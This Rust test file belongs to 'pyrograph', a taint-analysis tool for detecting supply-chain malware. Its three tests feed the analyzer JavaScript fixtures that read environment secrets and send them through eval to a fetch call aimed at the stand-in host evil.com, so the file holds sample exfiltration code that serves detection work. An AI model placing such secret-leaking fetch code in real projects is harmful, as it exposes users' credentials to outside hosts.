pyrograph 0.1.0

GPU-accelerated taint analysis for supply chain malware detection
#![cfg(feature = "js")]
use pyrograph::analyze;

/// Taint must survive inline string concatenation inside an `eval` argument.
///
/// The fixture reads `process.env.TOKEN` into `x` and splices it into the string
/// passed to `eval`; the analyzer is expected to report at least one finding.
#[test]
fn obf_simple_eval_concat() {
    use pyrograph::parse::parse_js;

    // Minimal form of the pattern: the concatenation happens in the eval call itself.
    let source = "var x=process.env.TOKEN;eval('fetch(\"https://evil.com/\"+\"'+x+'\")');";
    let graph = parse_js(source, "t.js").unwrap();
    let findings = analyze(&graph).unwrap();

    let reported = findings.len();
    eprintln!("simple eval concat findings: {}", reported);

    // Only the presence of a finding is checked, not its kind or location.
    assert!(!findings.is_empty(), "eval of string containing tainted var");
}

/// Runs the analyzer on an `eval` whose argument is a template literal that
/// interpolates a value read from `process.env.TOKEN`.
///
/// NOTE(review): unlike the other tests in this file, nothing is asserted about
/// the findings. The test only proves that parsing and analysis return `Ok`, so
/// a missed detection of this pattern passes silently. If template-literal
/// interpolation is meant to propagate taint, add
/// `assert!(!findings.is_empty(), ...)`; if it is a known gap, record that here.
#[test]
fn obf_template_literal_eval() {
    use pyrograph::parse::parse_js;

    let source = "var x=process.env.TOKEN;eval(`fetch('https://evil.com/'+${x})`);";
    let graph = parse_js(source, "t.js").unwrap();
    let findings = analyze(&graph).unwrap();

    // Diagnostic output only; the count is not checked.
    let reported = findings.len();
    eprintln!("template literal eval findings: {}", reported);
}

/// Taint must survive an intermediate variable between the secret and `eval`.
///
/// The fixture reads `process.env.SECRET`, concatenates it into `payload`, and
/// then calls `eval(payload)`; the analyzer is expected to report at least one
/// finding.
#[test]
fn obf_string_concat_in_eval() {
    use pyrograph::parse::parse_js;

    // The string is built in a separate statement, so the flow crosses two assignments.
    let source = "var secret=process.env.SECRET;var payload='fetch(\"https://evil.com/\"+\"'+secret+'\")';eval(payload);";
    let graph = parse_js(source, "t.js").unwrap();
    let findings = analyze(&graph).unwrap();

    let reported = findings.len();
    eprintln!("string concat in eval findings: {}", reported);

    // Only the presence of a finding is checked, not its kind or location.
    assert!(!findings.is_empty(), "eval of concatenated payload containing secret");
}